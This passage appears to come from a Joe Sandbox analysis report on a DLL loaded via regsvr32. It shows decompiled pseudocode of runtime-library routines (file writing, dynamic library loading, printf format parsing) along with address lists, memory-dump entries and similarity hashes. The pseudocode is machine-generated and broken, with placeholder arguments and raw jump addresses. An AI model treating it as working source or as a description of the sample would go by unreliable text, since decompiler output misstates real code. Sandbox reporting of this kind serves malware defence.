				r8d = _t52;
				_v116 = _t50;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x800421ce;
				if (_v112 - 1 < 0) goto 0x800421d6;
				 *((intOrPtr*)(_t126 + 8)) =  *((intOrPtr*)(_t126 + 8)) + 1;
				 *((intOrPtr*)(_t126 + 4)) =  *((intOrPtr*)(_t126 + 4)) + 1;
				goto 0x8004206c;
				 *((char*)( *((intOrPtr*)(0x8005ea90 + _t161 * 8)) + _t147 + 0x3e)) =  *((intOrPtr*)(_t143 + 2));
				 *( *((intOrPtr*)(0x8005ea90 + _t161 * 8)) + _t147 + 0x3d) =  *( *((intOrPtr*)(0x8005ea90 + _t161 * 8)) + _t147 + 0x3d) | 0x00000004;
				 *((intOrPtr*)(_t126 + 4)) =  *((intOrPtr*)(_t126 + 4)) + 1;
				goto 0x800421d6;
				 *_t126 = GetLastError();
				return E000000011800010E0(_t85,  *((intOrPtr*)(_t126 + 8)) - _v96 + __edi, _v72 ^ _t149 - 0x00000080);
			}






























                                                                                                    0x180041ff8
                                                                                                    0x180041ff8
                                                                                                    0x180041ff8
                                                                                                    0x180042012
                                                                                                    0x18004201c
                                                                                                    0x18004202d
                                                                                                    0x180042030
                                                                                                    0x180042037
                                                                                                    0x18004203e
                                                                                                    0x180042042
                                                                                                    0x180042045
                                                                                                    0x180042051
                                                                                                    0x18004205d
                                                                                                    0x180042060
                                                                                                    0x180042063
                                                                                                    0x180042066
                                                                                                    0x18004206c
                                                                                                    0x180042072
                                                                                                    0x18004207c
                                                                                                    0x180042080
                                                                                                    0x180042084
                                                                                                    0x18004208b
                                                                                                    0x180042094
                                                                                                    0x180042098
                                                                                                    0x1800420a2
                                                                                                    0x1800420a5
                                                                                                    0x1800420a9
                                                                                                    0x1800420ab
                                                                                                    0x1800420b0
                                                                                                    0x1800420bc
                                                                                                    0x1800420c1
                                                                                                    0x1800420c7
                                                                                                    0x1800420dc
                                                                                                    0x1800420e5
                                                                                                    0x1800420e7
                                                                                                    0x1800420fc
                                                                                                    0x180042102
                                                                                                    0x18004210c
                                                                                                    0x180042119
                                                                                                    0x18004211f
                                                                                                    0x180042129
                                                                                                    0x180042131
                                                                                                    0x180042137
                                                                                                    0x18004213c
                                                                                                    0x18004214a
                                                                                                    0x180042150
                                                                                                    0x180042154
                                                                                                    0x180042161
                                                                                                    0x18004216b
                                                                                                    0x180042172
                                                                                                    0x180042178
                                                                                                    0x18004217e
                                                                                                    0x180042181
                                                                                                    0x180042186
                                                                                                    0x180042186
                                                                                                    0x18004218e
                                                                                                    0x1800421a0
                                                                                                    0x1800421a6
                                                                                                    0x1800421a8
                                                                                                    0x1800421ab
                                                                                                    0x1800421b1
                                                                                                    0x1800421bc
                                                                                                    0x1800421c4
                                                                                                    0x1800421c9
                                                                                                    0x1800421cc
                                                                                                    0x1800421d4
                                                                                                    0x1800421ff

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 3659116390-0
                                                                                                    • Opcode ID: cd9b01bfc0e62860cce7012b595b0b76013e4da51feb252c987921fe0aa4f917
                                                                                                    • Instruction ID: d4ac94b636248cffecd8f31849c2133be491ee9856f112c88c1fd459f090a25d
                                                                                                    • Opcode Fuzzy Hash: cd9b01bfc0e62860cce7012b595b0b76013e4da51feb252c987921fe0aa4f917
                                                                                                    • Instruction Fuzzy Hash: BB51AC32B20A548AF752CB65E8843DD3BB0B359BDCF458115EF4A57AA9DF34C289C704
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002F894 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2479471862-0
                                                                                                    • Opcode ID: 551f10f66ef997b044a1778f765f3653cca2b5e41c343988e902f580c2070cc0
                                                                                                    • Instruction ID: ad223506433cf3b5ab2066764e6bada5445c888c8f03d85883dd6bc526d42f98
                                                                                                    • Opcode Fuzzy Hash: 551f10f66ef997b044a1778f765f3653cca2b5e41c343988e902f580c2070cc0
                                                                                                    • Instruction Fuzzy Hash: 25610A76A14F8882E7528B29C5413A83760F7ADFC8F55D211EA8D57766DF39E2CA8300
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002CDF4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 36%
                                                                                                    			E0000000118002CDF4(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				signed long long _t72;
				signed long long _t76;
				intOrPtr _t78;
				signed long long _t80;
				signed long long _t89;
				struct HINSTANCE__* _t94;
				signed long long _t95;
				long long _t101;
				void* _t105;
				signed long long _t109;
				signed long long _t111;
				signed long long _t114;
				struct HINSTANCE__* _t115;
				long _t118;
				void* _t121;
				WCHAR* _t123;

				 *((long long*)(_t105 + 8)) = __rbx;
				 *((long long*)(_t105 + 0x10)) = _t101;
				 *((long long*)(_t105 + 0x18)) = __rsi;
				r14d = __ecx;
				_t111 =  *0x8005d010; // 0xb03f6156e10
				_t95 = _t94 | 0xffffffff;
				_t89 = _t111 ^  *(0x180000000 + 0x5e910 + _t121 * 8);
				asm("dec eax");
				if (_t89 == _t95) goto 0x8002cf75;
				if (_t89 == 0) goto 0x8002ce5d;
				_t72 = _t89;
				goto 0x8002cf77;
				if (__r8 == __r9) goto 0x8002cf09;
				_t78 =  *((intOrPtr*)(0x180000000 + 0x5e870 + __rsi * 8));
				if (_t78 == 0) goto 0x8002ce7d;
				if (_t78 == _t95) goto 0x8002cef5;
				goto 0x8002cef0;
				r8d = 0x800;
				LoadLibraryExW(_t123, _t121, _t118);
				if (_t72 != 0) goto 0x8002cebe;
				if (GetLastError() != 0x57) goto 0x8002cebc;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				_t80 = _t72;
				goto 0x8002cebe;
				if (_t80 != 0) goto 0x8002ced7;
				 *((intOrPtr*)(0x180000000 + 0x5e870 + __rsi * 8)) = _t95;
				goto 0x8002cef5;
				_t19 = 0x180000000 + 0x5e870 + __rsi * 8;
				_t76 =  *_t19;
				 *_t19 = _t80;
				if (_t76 == 0) goto 0x8002cef0;
				FreeLibrary(_t115);
				if (_t80 != 0) goto 0x8002cf4a;
				if (__r8 + 4 != __r9) goto 0x8002ce66;
				if (_t80 == 0) goto 0x8002cf5a;
				GetProcAddress(_t94);
				if (_t76 == 0) goto 0x8002cf53;
				_t109 =  *0x8005d010; // 0xb03f6156e10
				asm("dec eax");
				 *(0x180000000 + 0x5e910 + _t121 * 8) = _t76 ^ _t109;
				goto 0x8002cf77;
				goto 0x8002cf0b;
				_t114 =  *0x8005d010; // 0xb03f6156e10
				asm("dec eax");
				 *(0x180000000 + 0x5e910 + _t121 * 8) = _t95 ^ _t114;
				return 0;
			}



















                                                                                                    0x18002cdf4
                                                                                                    0x18002cdf9
                                                                                                    0x18002cdfe
                                                                                                    0x18002ce10
                                                                                                    0x18002ce2b
                                                                                                    0x18002ce32
                                                                                                    0x18002ce3c
                                                                                                    0x18002ce44
                                                                                                    0x18002ce4a
                                                                                                    0x18002ce53
                                                                                                    0x18002ce55
                                                                                                    0x18002ce58
                                                                                                    0x18002ce60
                                                                                                    0x18002ce69
                                                                                                    0x18002ce74
                                                                                                    0x18002ce79
                                                                                                    0x18002ce7b
                                                                                                    0x18002ce8a
                                                                                                    0x18002ce90
                                                                                                    0x18002ce9c
                                                                                                    0x18002cea7
                                                                                                    0x18002cea9
                                                                                                    0x18002ceb1
                                                                                                    0x18002ceb7
                                                                                                    0x18002ceba
                                                                                                    0x18002cec8
                                                                                                    0x18002cecd
                                                                                                    0x18002ced5
                                                                                                    0x18002ceda
                                                                                                    0x18002ceda
                                                                                                    0x18002ceda
                                                                                                    0x18002cee5
                                                                                                    0x18002ceea
                                                                                                    0x18002cef3
                                                                                                    0x18002cefc
                                                                                                    0x18002cf0e
                                                                                                    0x18002cf16
                                                                                                    0x18002cf1f
                                                                                                    0x18002cf21
                                                                                                    0x18002cf3a
                                                                                                    0x18002cf40
                                                                                                    0x18002cf48
                                                                                                    0x18002cf51
                                                                                                    0x18002cf53
                                                                                                    0x18002cf67
                                                                                                    0x18002cf6d
                                                                                                    0x18002cf93

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 190572456-0
                                                                                                    • Opcode ID: 22eeddd7595fc231e58771a8a1eca55b109228b3c7b9ca91315c3f9ba6a87b32
                                                                                                    • Instruction ID: b9f2341ee1400e19a6ba7f00ca351a1f757a98786be5b91214f44035f61d5b40
                                                                                                    • Opcode Fuzzy Hash: 22eeddd7595fc231e58771a8a1eca55b109228b3c7b9ca91315c3f9ba6a87b32
                                                                                                    • Instruction Fuzzy Hash: F4411571316A4881FEE79B169900BE66391B70CBD0F1AC926BD294B784DE3DC74D8341
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002D060 Relevance: 7.6, APIs: 5, Instructions: 73libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 16%
                                                                                                    			E0000000118002D060(long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed long long _t46;
				intOrPtr _t52;
				signed long long _t54;
				signed long long _t72;
				long _t76;
				void* _t79;
				WCHAR* _t82;

				_t46 = _t72;
				 *((long long*)(_t46 + 8)) = __rbx;
				 *((long long*)(_t46 + 0x10)) = __rbp;
				 *((long long*)(_t46 + 0x18)) = __rsi;
				 *((long long*)(_t46 + 0x20)) = __rdi;
				if (__rdx == __r8) goto 0x8002d12c;
				_t52 =  *((intOrPtr*)(0x180000000 + 0x5e870 + __rsi * 8));
				if (_t52 == 0) goto 0x8002d0ad;
				if (_t52 == 0xffffffff) goto 0x8002d11f;
				goto 0x8002d11a;
				r8d = 0x800;
				LoadLibraryExW(_t82, _t79, _t76);
				if (_t46 != 0) goto 0x8002d0ee;
				if (GetLastError() != 0x57) goto 0x8002d0ec;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				_t54 = _t46;
				goto 0x8002d0ee;
				if (_t54 != 0) goto 0x8002d101;
				 *((intOrPtr*)(0x180000000 + 0x5e870 + __rsi * 8)) = _t46 | 0xffffffff;
				goto 0x8002d11f;
				_t16 = 0x180000000 + 0x5e870 + __rsi * 8;
				 *_t16 = _t54;
				if ( *_t16 == 0) goto 0x8002d11a;
				FreeLibrary(??);
				if (_t54 != 0) goto 0x8002d137;
				if (__rdx + 4 != __r8) goto 0x8002d096;
				if (_t54 != 0) goto 0x8002d137;
				goto 0x8002d143;
				return GetProcAddress(??, ??);
			}










                                                                                                    0x18002d060
                                                                                                    0x18002d063
                                                                                                    0x18002d067
                                                                                                    0x18002d06b
                                                                                                    0x18002d06f
                                                                                                    0x18002d089
                                                                                                    0x18002d098
                                                                                                    0x18002d0a3
                                                                                                    0x18002d0a9
                                                                                                    0x18002d0ab
                                                                                                    0x18002d0ba
                                                                                                    0x18002d0c0
                                                                                                    0x18002d0cc
                                                                                                    0x18002d0d7
                                                                                                    0x18002d0d9
                                                                                                    0x18002d0e1
                                                                                                    0x18002d0e7
                                                                                                    0x18002d0ea
                                                                                                    0x18002d0f1
                                                                                                    0x18002d0f7
                                                                                                    0x18002d0ff
                                                                                                    0x18002d104
                                                                                                    0x18002d104
                                                                                                    0x18002d10f
                                                                                                    0x18002d114
                                                                                                    0x18002d11d
                                                                                                    0x18002d126
                                                                                                    0x18002d131
                                                                                                    0x18002d135
                                                                                                    0x18002d161

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$AddressErrorLastProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 778228865-0
                                                                                                    • Opcode ID: 350a368272439c7faf5f4d71e5923c2e784774c56241bba1db4b6dee84ee725b
                                                                                                    • Instruction ID: 4ca03891468219f01b90b91f9ed488501d68f860449eb1b299a4ad9d069db593
                                                                                                    • Opcode Fuzzy Hash: 350a368272439c7faf5f4d71e5923c2e784774c56241bba1db4b6dee84ee725b
                                                                                                    • Instruction Fuzzy Hash: 1121D631315B0C91FE979F16984439963A4FB4DBF0F18C625EE2947BD0DEB8CA598304
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800452A0 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 85%
                                                                                                    			E000000011800452A0(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t47;
				void* _t52;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x800452d1;
				if (__edx >= 0) goto 0x800452d1;
				E000000011800468B0(_t27, _t52);
				_t28 = _t27 & 0xfffffff7;
				goto 0x80045328;
				_t43 = 0x00000004 & dil;
				if (_t43 == 0) goto 0x800452ec;
				asm("dec eax");
				if (_t43 >= 0) goto 0x800452ec;
				E000000011800468B0(_t28, _t52);
				_t29 = _t28 & 0xfffffffb;
				goto 0x80045328;
				_t44 = dil & 0x00000001;
				if (_t44 == 0) goto 0x80045308;
				asm("dec eax");
				if (_t44 >= 0) goto 0x80045308;
				E000000011800468B0(_t29, _t52);
				_t30 = _t29 & 0xfffffffe;
				goto 0x80045328;
				_t45 = dil & 0x00000002;
				if (_t45 == 0) goto 0x80045328;
				asm("dec eax");
				if (_t45 >= 0) goto 0x80045328;
				if ((dil & 0x00000010) == 0) goto 0x80045325;
				E000000011800468B0(_t30, _t52);
				_t31 = _t30 & 0xfffffffd;
				_t47 = dil & 0x00000010;
				if (_t47 == 0) goto 0x80045342;
				asm("dec eax");
				if (_t47 >= 0) goto 0x80045342;
				E000000011800468B0(_t31, _t52);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}













                                                                                                    0x1800452a0
                                                                                                    0x1800452a5
                                                                                                    0x1800452b4
                                                                                                    0x1800452bc
                                                                                                    0x1800452c0
                                                                                                    0x1800452c7
                                                                                                    0x1800452cc
                                                                                                    0x1800452cf
                                                                                                    0x1800452d6
                                                                                                    0x1800452d9
                                                                                                    0x1800452db
                                                                                                    0x1800452e0
                                                                                                    0x1800452e2
                                                                                                    0x1800452e7
                                                                                                    0x1800452ea
                                                                                                    0x1800452ec
                                                                                                    0x1800452f0
                                                                                                    0x1800452f2
                                                                                                    0x1800452f7
                                                                                                    0x1800452fe
                                                                                                    0x180045303
                                                                                                    0x180045306
                                                                                                    0x180045308
                                                                                                    0x18004530c
                                                                                                    0x18004530e
                                                                                                    0x180045313
                                                                                                    0x180045319
                                                                                                    0x180045320
                                                                                                    0x180045325
                                                                                                    0x180045328
                                                                                                    0x18004532c
                                                                                                    0x18004532e
                                                                                                    0x180045333
                                                                                                    0x18004533a
                                                                                                    0x180045358

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _set_statfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156100317-0
                                                                                                    • Opcode ID: 0265710046fc8bd8b54b3a966fe3dccf4a1ccd4fb710691fb440e76750dd9f88
                                                                                                    • Instruction ID: 744a362ec646477ec9c3027e152214fb8985fa62b418f502999dd85414b732a5
                                                                                                    • Opcode Fuzzy Hash: 0265710046fc8bd8b54b3a966fe3dccf4a1ccd4fb710691fb440e76750dd9f88
                                                                                                    • Instruction Fuzzy Hash: 46110232A10F0905F6DA0528E4C23ED01416B5E3FFF4BC728B9E2166E7CEA88B49430D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001A538 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 66%
                                                                                                    			E0000000118001A538(signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				void* _t64;
				intOrPtr _t68;
				char _t69;
				intOrPtr _t74;
				signed int _t86;
				intOrPtr _t89;
				void* _t92;
				void* _t96;
				char _t103;
				void* _t104;
				signed int _t107;
				intOrPtr _t120;
				intOrPtr* _t141;
				char _t142;
				intOrPtr* _t143;
				void* _t145;
				intOrPtr _t148;
				void* _t156;
				signed int* _t160;
				signed int* _t167;

				_t156 = __rdx;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t145 = __rcx;
				_t148 =  *((intOrPtr*)(__rcx + 0x468));
				if (_t148 != 0) goto 0x8001a573;
				_t64 = E0000000118002E69C(__rax);
				 *__rax = 0x16;
				E0000000118002E4F0(_t64);
				goto 0x8001a57c;
				if (E00000001180027BA4(_t96, _t104, _t148) != 0) goto 0x8001a584;
				goto 0x8001a7bc;
				if ( *((intOrPtr*)(__rcx + 0x18)) == __rbp) goto 0x8001a561;
				_t107 = __edi | 0xffffffff;
				 *((intOrPtr*)(__rcx + 0x478)) =  *((intOrPtr*)(__rcx + 0x478)) + 1;
				_t68 =  *((intOrPtr*)(__rcx + 0x478));
				if (_t68 == 3) goto 0x8001a7b9;
				if (_t68 != 2) goto 0x8001a5bb;
				if ( *((intOrPtr*)(__rcx + 0x47c)) == 1) goto 0x8001a7b9;
				_t141 =  *((intOrPtr*)(__rcx + 0x480));
				_t167 = __rcx + 0x34;
				_t160 = __rcx + 0x38;
				 *((intOrPtr*)(__rcx + 0x47c)) = 0;
				 *(__rcx + 0xde8) = _t107;
				 *(__rcx + 0xdec) = _t107;
				 *_t167 = 0;
				 *_t160 = 0;
				 *((long long*)(__rcx + 0x18)) = _t141;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *(__rcx + 0x2c) = 0;
				_t69 =  *_t141;
				 *((char*)(__rcx + 0x41)) = _t69;
				if (_t69 == 0) goto 0x8001a790;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x8001a794;
				if ( *((intOrPtr*)(__rcx + 0x41)) - 0x20 - 0x5a > 0) goto 0x8001a621;
				_t142 =  *((char*)(__rcx + 0x41));
				goto 0x8001a623;
				 *(__rcx + 0x2c) = ( *(_t148 + 0x8004ba40) & 0x000000ff) >> 4;
				if (E000000011800271F4(__rcx) == 0) goto 0x8001a7b5;
				_t74 =  *((intOrPtr*)(_t145 + 0x2c));
				if (_t74 == 8) goto 0x8001a7a5;
				_t120 = _t74;
				if (_t120 == 0) goto 0x8001a773;
				if (_t120 == 0) goto 0x8001a75e;
				if (_t120 == 0) goto 0x8001a729;
				if (_t120 == 0) goto 0x8001a6e8;
				if (_t120 == 0) goto 0x8001a6e1;
				if (_t120 == 0) goto 0x8001a6a0;
				if (_t120 == 0) goto 0x8001a693;
				if (_t74 - 0xfffffffffffffffc != 1) goto 0x8001a7b5;
				E0000000118001EB24(_t142, _t145, _t145, _t156, _t160, __rbp);
				goto 0x8001a77b;
				E0000000118001D764(_t142, _t145);
				goto 0x8001a77b;
				if ( *((char*)(_t145 + 0x41)) == 0x2a) goto 0x8001a6b6;
				E00000001180019D84(_t145, _t145, _t160);
				goto 0x8001a77b;
				if (E00000001180026B9C(( *(_t148 + 0x8004ba40) & 0x000000ff) >> 4, _t142, _t145, _t145) == 0) goto 0x8001a7b5;
				if ( *((intOrPtr*)(_t145 + 0x478)) != 1) goto 0x8001a6d9;
				if ( *((intOrPtr*)(_t145 + 0x47c)) != 1) goto 0x8001a77f;
				if ( *_t160 >= 0) goto 0x8001a725;
				 *_t160 = _t107;
				goto 0x8001a725;
				 *_t160 = 0;
				goto 0x8001a77f;
				if ( *((char*)(_t145 + 0x41)) == 0x2a) goto 0x8001a6f6;
				goto 0x8001a6ac;
				if (E000000011800266F4(( *(_t148 + 0x8004ba40) & 0x000000ff) >> 4, _t142, _t145, _t145) == 0) goto 0x8001a7b5;
				if ( *((intOrPtr*)(_t145 + 0x478)) != 1) goto 0x8001a715;
				if ( *((intOrPtr*)(_t145 + 0x47c)) != 1) goto 0x8001a77f;
				_t86 =  *_t167;
				if (_t86 >= 0) goto 0x8001a725;
				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000004;
				 *_t167 =  ~_t86;
				goto 0x8001a77b;
				_t89 =  *((intOrPtr*)(_t145 + 0x41));
				if (_t89 == 0x20) goto 0x8001a758;
				if (_t89 == 0x23) goto 0x8001a752;
				if (_t89 == 0x2b) goto 0x8001a74c;
				if (_t89 == 0x2d) goto 0x8001a746;
				if (_t89 != 0x30) goto 0x8001a77f;
				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000008;
				goto 0x8001a77f;
				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000004;
				goto 0x8001a77f;
				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000001;
				goto 0x8001a77f;
				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000020;
				goto 0x8001a77f;
				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000002;
				goto 0x8001a77f;
				 *_t167 = 0;
				 *((intOrPtr*)(_t145 + 0x40)) = bpl;
				 *(_t145 + 0x30) = 0;
				 *_t160 = _t107;
				 *((intOrPtr*)(_t145 + 0x3c)) = 0;
				 *((intOrPtr*)(_t145 + 0x54)) = bpl;
				goto 0x8001a77f;
				if (E0000000118001C554(_t145) == 0) goto 0x8001a7b5;
				_t143 =  *((intOrPtr*)(_t145 + 0x18));
				_t103 =  *_t143;
				 *((char*)(_t145 + 0x41)) = _t103;
				if (_t103 != 0) goto 0x8001a5f8;
				 *((long long*)(_t145 + 0x18)) =  *((long long*)(_t145 + 0x18)) + 1;
				if (E000000011800276DC(_t143, _t145) == 0) goto 0x8001a7b5;
				goto 0x8001a594;
				_t92 = E0000000118002E69C(_t143);
				 *_t143 = 0x16;
				E0000000118002E4F0(_t92);
				goto 0x8001a7bc;
				return  *((intOrPtr*)(_t145 + 0x28));
			}























                                                                                                    0x18001a538
                                                                                                    0x18001a538
                                                                                                    0x18001a53d
                                                                                                    0x18001a542
                                                                                                    0x18001a550
                                                                                                    0x18001a555
                                                                                                    0x18001a55f
                                                                                                    0x18001a561
                                                                                                    0x18001a566
                                                                                                    0x18001a56c
                                                                                                    0x18001a571
                                                                                                    0x18001a57a
                                                                                                    0x18001a57f
                                                                                                    0x18001a588
                                                                                                    0x18001a58a
                                                                                                    0x18001a594
                                                                                                    0x18001a59a
                                                                                                    0x18001a5a3
                                                                                                    0x18001a5ac
                                                                                                    0x18001a5b5
                                                                                                    0x18001a5bb
                                                                                                    0x18001a5c2
                                                                                                    0x18001a5c6
                                                                                                    0x18001a5ca
                                                                                                    0x18001a5d0
                                                                                                    0x18001a5d6
                                                                                                    0x18001a5dc
                                                                                                    0x18001a5df
                                                                                                    0x18001a5e1
                                                                                                    0x18001a5e5
                                                                                                    0x18001a5e8
                                                                                                    0x18001a5eb
                                                                                                    0x18001a5ed
                                                                                                    0x18001a5f2
                                                                                                    0x18001a5f8
                                                                                                    0x18001a5ff
                                                                                                    0x18001a60f
                                                                                                    0x18001a611
                                                                                                    0x18001a61f
                                                                                                    0x18001a630
                                                                                                    0x18001a63d
                                                                                                    0x18001a643
                                                                                                    0x18001a649
                                                                                                    0x18001a64f
                                                                                                    0x18001a651
                                                                                                    0x18001a65a
                                                                                                    0x18001a663
                                                                                                    0x18001a66c
                                                                                                    0x18001a671
                                                                                                    0x18001a676
                                                                                                    0x18001a67b
                                                                                                    0x18001a680
                                                                                                    0x18001a689
                                                                                                    0x18001a68e
                                                                                                    0x18001a696
                                                                                                    0x18001a69b
                                                                                                    0x18001a6a7
                                                                                                    0x18001a6ac
                                                                                                    0x18001a6b1
                                                                                                    0x18001a6bd
                                                                                                    0x18001a6ca
                                                                                                    0x18001a6d3
                                                                                                    0x18001a6db
                                                                                                    0x18001a6dd
                                                                                                    0x18001a6df
                                                                                                    0x18001a6e1
                                                                                                    0x18001a6e3
                                                                                                    0x18001a6ef
                                                                                                    0x18001a6f4
                                                                                                    0x18001a6fd
                                                                                                    0x18001a70a
                                                                                                    0x18001a713
                                                                                                    0x18001a715
                                                                                                    0x18001a71a
                                                                                                    0x18001a71c
                                                                                                    0x18001a722
                                                                                                    0x18001a727
                                                                                                    0x18001a729
                                                                                                    0x18001a72e
                                                                                                    0x18001a732
                                                                                                    0x18001a736
                                                                                                    0x18001a73a
                                                                                                    0x18001a73e
                                                                                                    0x18001a740
                                                                                                    0x18001a744
                                                                                                    0x18001a746
                                                                                                    0x18001a74a
                                                                                                    0x18001a74c
                                                                                                    0x18001a750
                                                                                                    0x18001a752
                                                                                                    0x18001a756
                                                                                                    0x18001a758
                                                                                                    0x18001a75c
                                                                                                    0x18001a75e
                                                                                                    0x18001a761
                                                                                                    0x18001a765
                                                                                                    0x18001a768
                                                                                                    0x18001a76a
                                                                                                    0x18001a76d
                                                                                                    0x18001a771
                                                                                                    0x18001a77d
                                                                                                    0x18001a77f
                                                                                                    0x18001a783
                                                                                                    0x18001a785
                                                                                                    0x18001a78a
                                                                                                    0x18001a790
                                                                                                    0x18001a79e
                                                                                                    0x18001a7a0
                                                                                                    0x18001a7a5
                                                                                                    0x18001a7aa
                                                                                                    0x18001a7b0
                                                                                                    0x18001a7b7
